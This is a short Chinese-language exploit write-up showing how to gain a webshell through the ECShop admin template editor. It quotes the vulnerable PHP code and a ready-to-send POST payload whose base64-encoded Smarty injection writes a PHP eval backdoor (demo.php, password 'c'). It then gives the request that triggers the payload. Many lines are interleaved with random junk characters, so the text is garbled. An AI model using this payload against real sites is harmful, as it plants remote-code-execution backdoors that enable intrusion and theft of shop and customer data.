Ecshop后台getshell

admin

首先 ecshop用的是smarty 这样就可以通过它的fetch函数来执行模板

而模板里面可以执行他定义的php代码，这样只要可以写出模板 然后找到调用就可以拿到shell了
$ T  A8 @( f: V8 z8 q但是ecshop似乎不支持{php}{/php}这个标签来执行php代码
admin/template.php
! ?! ?8 O$ Y/ D- [; A% v
1 if ($_REQUEST['act'] == 'update_library')

2   

3 {
+ I1 d' W0 l/ g1 ~5 @
4     check_authz_json('library_manage');
8 Z) x" H5 d, P7 S+ h, j* s
5   
5 }  j$ ~; ^- `, ?
) |; h: \! m7 ^3 r3 h: v6     $html = stripslashes(json_str_iconv($_POST['html']));
6 i$ y: x- H& w( A1 M. G
1 Y4 c( {% t. r9 v! W7   
+ R, H" F0 h" I) e2 j7 X
8     $lib_file = '../themes/' . $_CFG['template'] . '/library/' .$_POST['lib'] . '.lbi'; //模板文件
, \/ r( L4 R7 z2 `* i0 Z7 u
9   
! S$ P$ E8 b0 p  x8 l, t
10     $lib_file = str_replace("0xa", '', $lib_file); // 过滤 0xa 非法字符
2 D; b  N# c. K8 q9 q1 b) S
& [: D: B  m2 h  c1 T11   

  q( D# A6 _2 B/ |12     $org_html = str_replace("\xEF\xBB\xBF", '',file_get_contents($lib_file));
/ I5 G# Q6 D4 J, u
) H1 w+ T; R3 G8 E1 O7 W( y8 B3 N13   
" }- ]4 _( W. a
14     if (@file_exists($lib_file) === true && @file_put_contents($lib_file,$html))//写出

15     {

1 h! y) l2 F; n8 y+ ^* B, q8 M& V16         @file_put_contents('../temp/backup/library/' . $_CFG['template'] .'-' . $_POST['lib'] . '.lbi', $org_html);
& b% y3 j  l# W+ H/ Y) `4 K
17         make_json_result('', $_LANG['update_lib_success']);
/ _: Z* @7 F4 F
1 b9 J1 B- u/ z  Z18     }
) `8 p1 r. t3 u6 s
19     else

7 b) S1 F6 F. z, L% |) t+ a20     {
& U- E" p8 |* [0 p. b
21         make_json_error(sprintf($_LANG['update_lib_failed'], 'themes/' .$_CFG['template'] . '/library'));
& Y4 ~, O/ e- x0 {* E9 k7 {0 P
# ~/ ~; U; ?( }8 U# M9 R: }22     }

) o) V) B+ R. B4 ]) K. W  @23 }

那么找个比较方便调用了模板的文件
6 }( ~, z: J8 Vindex.php
) W  n) `1 c+ L+ Q' ~' c2 N
0 ^" x9 }. b( W& D8 Z1 if ($act == 'cat_rec')

7 k0 @7 [8 @1 w" f7 @2   

" X8 l* e; k, O8 C& J3 g" {* d3 {

' N+ E+ y+ L) {% ]: S. z/ L4   
; c% c1 s/ t6 ?1 c9 X5 Q
, j# q; q, D) e1 ~( D1 I( A5     $rec_array = array(1 => 'best', 2 => 'new', 3 => 'hot');

6   

7     $rec_type = !empty($_REQUEST['rec_type']) ?intval($_REQUEST['rec_type']) : '1';

/ l/ ~" u% J$ l8   

3 p/ d( |0 I( _# W. ~: U, j9     $cat_id = !empty($_REQUEST['cid']) ? intval($_REQUEST['cid']) : '0';

- C/ O0 s+ A( H  ], M( H) ^* f8 b10   
' B7 ]# n' ^  P; j
8 ^/ Q' ]4 H9 C) M$ q11     include_once('includes/cls_json.php');

. L4 c8 L+ U% h  s4 W8 Q. v' L, l12   
0 j/ Y- X7 e" z* d% s) J: m
( X/ S, n+ C, A& x13     $json = new JSON;
3 j+ n: `3 t6 Q2 i1 K
14   

# c6 u; z0 m7 ]5 k! S  e9 s15     $result   = array('error' => 0, 'content' => '', 'type' => $rec_type,'cat_id' => $cat_id);
1 T( f& }* R' }# C1 E& ~
16   

7 s) x# `9 f1 N/ H' |5 G17     $children = get_children($cat_id);
/ b1 `$ x- Q4 M: k5 l0 H, Q% d
& U" Y1 T* a: g' g5 A* g" Z18   

19     $smarty->assign($rec_array[$rec_type] . '_goods',      get_category_recommend_goods($rec_array[$rec_type], $children));    // 推荐商品
, h. x: m$ }4 b) B* `4 N
3 @1 x) Z2 \9 |: r! z& r' w20   
5 D5 `! i: ?* h. u
21     $smarty->assign('cat_rec_sign', 1);

1 Y/ {5 n% q3 o) G# c! f22   
) r9 ]5 T, ~( y9 W( R3 O8 g  F
23     $result['content'] = $smarty->fetch('library/recommend_' .$rec_array[$rec_type] . '.lbi');//使用了模板文件 该模板文件为recommend_best

, r6 }9 `2 K2 |' `- ^" s  P2 R24   

25         echo 'library/recommend_' . $rec_array[$rec_type] . '.lbi';

26   
; A3 V* q" G* N, I& h3 s: H+ I
0 N  a5 F( g& C7 [, w27         echo $rec_array[$rec_type];

4 z! G8 ?+ u1 _* ~28   
+ C# T8 ^' g& x/ g
29     die($json->encode($result));

0 e. Q7 D, B1 z6 }/ d% N) d- @30   
! n5 ]. q- f! ]+ W
31 }

! \9 L$ ~8 q0 \; q; ~( Z& u4 F1 l& Y那么就有利用方法了
. g0 H: ~4 a$ o+ g- b) Q8 j" Wpost包到http://localhost/ec/admin/template.php?act=update_library
Post内容：

​
1 lib=recommend_best&html={iffputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}16086{/if}

' f" U$ Z: W/ X5 n8 a4 N3 Q  D: \4 o3 q( M然后访问http://localhost/ec/index.php?act=cat_rec
( n- C  W2 H1 C) |
7 P  S' H- |7 w% r2 R4 ushel地址：http://localhost/ec/demo.php
密码c
, C2 A% s* b, t' e